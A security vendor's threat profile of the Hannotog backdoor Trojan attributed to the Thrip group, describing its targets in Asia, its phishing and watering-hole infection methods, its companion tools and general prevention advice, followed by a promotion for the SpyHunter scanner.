Posted: March 30, 2020

Hannotog Description

Hannotog is a backdoor Trojan deployed by Thrip, a China-based threat actor. Hannotog can let attackers control computers through executing system commands, and at-risk targets include government, military and communications networks in Asia. Let credible anti-malware products determine the appropriate methods for uninstalling Hannotog, which shows few symptoms and may be undetectable by users while present.

Backdoors Cracking Open in the Most Threatening of Places

While inadequately-secured Trojan campaigns may out themselves almost instantly, as in the case of some botnets, state-sponsored hackings are another matter. The apparent Billbug branch of Thrip, a group of specialized, China-based hackers, is using Hannotog backdoor Trojans and other tools, both White and Black Hat, for achieving their goals. With Hannotog, they've been finding success in their goals for three years running.

Since 2017, campaigns using Hannotog have gained access to the networks of sat-com operators, governments, and their military branches, with a regional focus on Southeast Asian nations like Indonesia and Vietnam. Infection methods that Thrip prefers are e-mail attacks – also known as phishing lures – with attachments or links, along with occasional watering-hole efforts for infecting a vulnerable website's traffic. The payload can include more than just Hannotog, as malware experts also clarify on the dropped threats: spyware like Catchamas, and Sagerunex (a backdoor Trojan, like Hannotog).

Hannotog is a Trojan that's under the purview of Thrip solely and provides the hackers with long-term system persistence options. Hannotog coordinates this role with the help of Sagerunex for delivering broader remote accessibility and Catchamas for collecting passwords and credentials for account hijackings. Users should treat Hannotog as equally capable as similar backdoor Trojans at basic attack tasks like executing system commands, transferring files, or disabling security features and applications like the Task Manager.

The Open Doors Leading to Invisible Drafts

One aspect of Hannotog's deployment should raise concern among all workers depending on threat-flagging technology like conventional anti-virus scanners excessively. Thrip often makes use of LOLbin (living-off-the-land) and multipurpose software, such as Windows PowerShell. By doing so, the attackers can seize control over systems and accounts without requiring Hannotog, or a similar Trojan's presence on each PC. This tactic is likely to cement surveillance opportunities in military networks and other environments with strict rule-sets concerning allowable files, network traffic and software.

Users should prevent Hannotog infections and related attacks by monitoring e-mails and website activity. Software patches can disable the vulnerabilities available to Thrip's misuse, and deactivating features like Flash, JavaScript, and document macros will further limit the opportunities for drive-by-downloads. Victims may receive custom-crafted content specific to them and including references to their workplace or related industries.

As always, professional anti-malware products have the best chances of removing Hannotog, and all similar backdoor Trojans, safely from already-infected computers. The Trojan is Windows-specific, although its deployment has broad implications for any associated devices.

Hannotog is a backdoor Trojan whose payload includes features not yet available for an in-depth analysis. However, it's all too transparent that it's another monitoring-software doing China – or a threat actor that wishes to suggest such – the favor of monitoring foreign computer networks.

Use SpyHunter to Detect and Remove PC Threats

If you are concerned that malware or PC threats similar to Hannotog may have infected your computer, we recommend you start an in-depth system scan with SpyHunter. SpyHunter is an advanced malware protection and remediation application that offers subscribers a comprehensive method for protecting PCs from malware, in addition to providing one-on-one technical support service.

Download SpyHunter's Malware Scanner

Note: SpyHunter's free version is only for malware detection. If SpyHunter detects malware on your PC, you will need to purchase SpyHunter's malware tool to remove the malware threats. Learn more on SpyHunter. If you would like to uninstall SpyHunter for any reason, please follow these uninstall instructions. To learn more about our policies and practices, visit our EULA, Privacy Policy and Threat Assessment Criteria.

Why can't I open any program including SpyHunter? You may have a malware file running in memory that kills any programs that you try to launch on your PC. Tip: Download SpyHunter from a clean computer, copy it to a USB thumb drive, DVD or CD, then install it on the infected PC and run SpyHunter's malware scanner.

Leave a Reply

Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter. If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.